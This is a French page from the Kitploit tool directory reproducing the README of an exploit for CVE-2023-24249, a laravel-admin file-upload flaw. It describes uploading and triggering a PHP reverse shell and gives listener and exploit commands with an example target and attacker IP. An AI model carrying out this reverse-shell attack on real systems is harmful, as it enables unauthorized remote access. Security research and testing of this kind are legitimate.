Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-24249-Exploit — Script d'exploitation pour CVE-2023-24249 - une vulnérabilité permettant l'exécution de code à distance via le téléversement de fichiers et l'injection de commandes. | Kitploit
Outils/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Script d'exploitation pour CVE-2023-24249 - une vulnérabilité permettant l'exécution de code à distance via le téléversement de fichiers et l'injection de commandes.

Voir le dépôt
9112il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Script d'exploit CVE-2023-24249

Description

Ce dépôt contient un script d'exploit pour CVE-2023-24249, une vulnérabilité critique présente dans laravel-admin version 1.8.19. Cette vulnérabilité permet un téléchargement de fichiers arbitraires, permettant aux attaquants d'exécuter du code arbitraire via un fichier PHP spécialement conçu. L'exploit démontre comment un attaquant peut télécharger un reverse shell vers l'application cible et l'exécuter pour obtenir un accès distant.

Détails de la vulnérabilité

CVE-2023-24249 est une vulnérabilité de téléchargement de fichiers arbitraires dans laravel-admin v1.8.19. Cette vulnérabilité permet aux attaquants de télécharger et d'exécuter des fichiers PHP arbitraires, conduisant à une exécution de code à distance potentielle.

  • Score de base : 7.2 HIGH
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Énumération des faiblesses : CWE-434 - Téléchargement de fichier sans restriction de type dangereux

Références

Exploit - Avis tiers
  • Dépôt GitHub de Laravel Admin
  • Site web officiel de Laravel Admin
  • Script d'exploit

    Le script d'exploit fourni automatise le processus d'exploitation de CVE-2023-24249. Il effectue les étapes suivantes :

    1. Authentification : se connecte à l'application cible en utilisant les identifiants fournis.
    2. Envoi du reverse shell : téléverse un script reverse shell PHP via la fonctionnalité vulnérable de téléchargement de fichiers.
    3. Exécution du reverse shell : envoie une requête GET au script reverse shell téléversé pour l'exécuter et établir une connexion de retour vers la machine de l'attaquant.

    Prérequis

    • Python 3
    • La bibliothèque requests
    • La bibliothèque beautifulsoup4

    Installez les bibliothèques requises avec pip :

    root@kitploit:~
    pip install requests beautifulsoup4
    

    Utilisation

    1. Clonez le dépôt :

      root@kitploit:~
      git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
      cd CVE-2023-24249-Exploit
      
    2. Démarrez un listener sur votre machine :

      root@kitploit:~
      nc -lvnp <PORT>
      
    3. Exécutez le script d'exploit :

      root@kitploit:~
      python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
      

      Remplacez <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> et <YOUR_PORT> par les valeurs appropriées :

      • <TARGET_URL> : l'URL de l'application cible.
      • <USERNAME> : le nom d'utilisateur pour l'authentification.
      • <PASSWORD> : le mot de passe pour l'authentification.
      • <YOUR_IP> : votre adresse IP pour recevoir la connexion du reverse shell.
      • <YOUR_PORT> : le port sur lequel votre listener est en écoute.

    Exemple

    root@kitploit:~
    python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
    

    Sortie du script

    Si l'exploit réussit, le script affichera :

    root@kitploit:~
    [+] Reverse shell uploaded successfully! Attempting to execute it...
    [+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
    

    Avertissement

    Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de ce script contre un système sans autorisation explicite est illégale et contraire à l'éthique. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par ce script.

    Télécharger l’outil